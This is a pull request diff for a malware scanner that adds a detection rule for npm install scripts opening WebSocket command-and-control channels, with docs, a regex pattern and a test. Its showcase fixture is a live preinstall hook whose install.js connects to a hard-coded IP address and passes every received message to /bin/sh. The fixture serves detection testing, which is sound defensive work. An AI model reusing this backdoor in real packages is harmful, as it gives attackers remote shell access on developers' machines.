### PR TITLE
chore(rules): add malware pattern updates 2026-03-03

### DIFF
--- a/docs/EXAMPLES.md
+++ b/docs/EXAMPLES.md
@@ -61,6 +61,7 @@ SkillScan ships a full showcase in `examples/showcase` to demonstrate detection 
 | `54_claude_hooks_rce` | Claude Code repo-scoped `.claude/settings.json` hooks (`PreToolUse`/etc.) include shell-capable `command` payloads and form a high-signal hook-execution chain in untrusted projects | `CHN-009`, `MAL-015` |
 | `55_pastebin_stegobin_resolver` | Pastebin dead-drop steganography markers (`pastebin` URL + `|||` + `===END===` + `vercel.app`) observed in recent StegaBin npm malware loaders | `MAL-016` |
 | `56_hex_decode_exec` | Hex-decoded command string (`Buffer.from(...,'hex').toString()`) followed by immediate `child_process` execution (`exec`/`spawn`) as seen in recent npm malware install chains | `SUP-009` |
+| `57_install_websocket_c2` | npm install script (`preinstall` + `install.js`) opens a WebSocket C2 channel and executes received commands via shell-capable process spawn | `MAL-017` |
 
 ## Commands
 

--- a/docs/RULE_UPDATES.md
+++ b/docs/RULE_UPDATES.md
@@ -1,5 +1,15 @@
 # Rule Updates
 
+## 2026-03-03
+
+- Added `MAL-017` (high): **WebSocket C2 shell execution marker**.
+- Rationale: newly reported npm malware clusters include install-time RAT behavior that opens persistent WebSocket channels and executes attacker-delivered shell commands in developer environments.
+- Rule scope is intentionally constrained to install-script context (`preinstall`/`postinstall` or `install.js`-style loader markers) plus explicit WebSocket C2 and shell-exec indicators to keep false positives low.
+
+Sources:
+- The Hacker News (2026-03-02), *North Korean Hackers Publish 26 npm Packages Hiding Pastebin C2 for Cross-Platform RAT*: https://thehackernews.com/2026/03/north-korean-hackers-publish-26-npm.html
+- Socket (2026-03-02), *StegaBin: 26 Malicious npm Packages Use Pastebin Steganography*: https://socket.dev/blog/stegabin-26-malicious-npm-packages-use-pastebin-steganography
+
 ## 2026-03-02
 
 - Added `MAL-016` (high): **Pastebin steganographic dead-drop resolver marker**.

--- a/examples/showcase/57_install_websocket_c2/install.js
+++ b/examples/showcase/57_install_websocket_c2/install.js
@@ -1,0 +1,1 @@
+const { spawn } = require('child_process'); const ws = new WebSocket('wss://103.106.67.63:1247/ws'); ws.onmessage = ({ data }) => { spawn('/bin/sh', ['-c', String(data)], { stdio: 'ignore' }); };

--- a/examples/showcase/57_install_websocket_c2/package.json
+++ b/examples/showcase/57_install_websocket_c2/package.json
@@ -1,0 +1,7 @@
+{
+  "name": "install-websocket-c2-demo",
+  "version": "1.0.0",
+  "scripts": {
+    "preinstall": "node install.js"
+  }
+}

--- a/examples/showcase/INDEX.md
+++ b/examples/showcase/INDEX.md
@@ -58,6 +58,7 @@ Each folder demonstrates one major detection or behavior.
 54. `54_claude_hooks_rce`: Claude Code project `hooks` config executes shell commands in repository-scoped settings (`CHN-009`, `MAL-015`)
 55. `55_pastebin_stegobin_resolver`: Pastebin dead-drop steganography markers (`pastebin` URL + `|||` + `===END===` + `vercel.app`) associated with StegaBin npm campaign (`MAL-016`)
 56. `56_hex_decode_exec`: Hex-decoded command strings immediately executed via `child_process` (`Buffer.from(...,'hex').toString()` + `exec/spawn`) as seen in recent npm malware install chains (`SUP-009`)
+57. `57_install_websocket_c2`: npm install-script (`preinstall` + `install.js`) opens WebSocket C2 and executes received shell commands (`spawn`/`exec`) (`MAL-017`)
 
 ## Run examples
 

--- a/src/skillscan/data/rules/default.yaml
+++ b/src/skillscan/data/rules/default.yaml
@@ -1,4 +1,4 @@
-version: "2026.03.02.2"
+version: "2026.03.03.1"
 
 static_rules:
   - id: MAL-001
@@ -341,6 +341,15 @@ static_rules:
     title: Pastebin steganographic dead-drop resolver marker
     pattern: '(?i)pastebin\.com/[A-Za-z0-9]{6,10}[^\n]{0,220}\|\|\|[^\n]{0,220}(?:vercel\.app[^\n]{0,220}===END===|===END===[^\n]{0,220}vercel\.app)'
     mitigation: Treat install-time loaders that decode C2 from Pastebin text as malicious. Remove dead-drop resolver logic and block outbound execution of decoded domains.
+
+  - id: MAL-017
+    category: malware_pattern
+    severity: high
+    confidence: 0.85
+    title: WebSocket C2 shell execution marker
+    pattern: '(?is)(?:new\s+WebSocket\s*\(|\bWebSocket\s*\(|\bwss?://(?:\d{1,3}\.){3}\d{1,3}:\d{2,5})[\s\S]{0,320}(?:exec|execSync|spawn|spawnSync)\s*\([^
+]{0,180}(?:/bin/sh|cmd(?:\.exe)?|powershell(?:\.exe)?|pwsh)?'
+    mitigation: Treat WebSocket command channels that launch shell/process execution as malicious. Remove package/runtime code that combines outbound WebSocket control paths with command execution primitives.
 
 action_patterns:
   download: '\b(curl|wget|invoke-webrequest|invoke-restmethod|iwr|irm|download|git\s+clone|pip\s+install|npm\s+install|certutil\s+-urlcache|bitsadmin)\b|https?://'

--- a/tests/test_showcase_examples.py
+++ b/tests/test_showcase_examples.py
@@ -82,6 +82,8 @@ def test_showcase_detection_rules() -> None:
     assert any(f.id == "MAL-016" for f in findings_55)
     findings_56 = _scan("examples/showcase/56_hex_decode_exec").findings
     assert any(f.id == "SUP-009" for f in findings_56)
+    findings_57 = _scan("examples/showcase/57_install_websocket_c2").findings
+    assert any(f.id == "MAL-017" for f in findings_57)
 
 
 def test_showcase_policy_block_domain() -> None:


### PR DESCRIPTION
## Summary
- add MAL-017 static rule for WebSocket C2 + shell/process execution marker
- add showcase fixture examples/showcase/57_install_websocket_c2 and wire docs/tests
- bump ruleset version to 2026.03.03.1 and document rationale/sources

## Validation
- .venv/bin/pytest -q
- .venv/bin/ruff check src tests

## Sources
- https://thehackernews.com/2026/03/north-korean-hackers-publish-26-npm.html
- https://socket.dev/blog/stegabin-26-malicious-npm-packages-use-pastebin-steganography
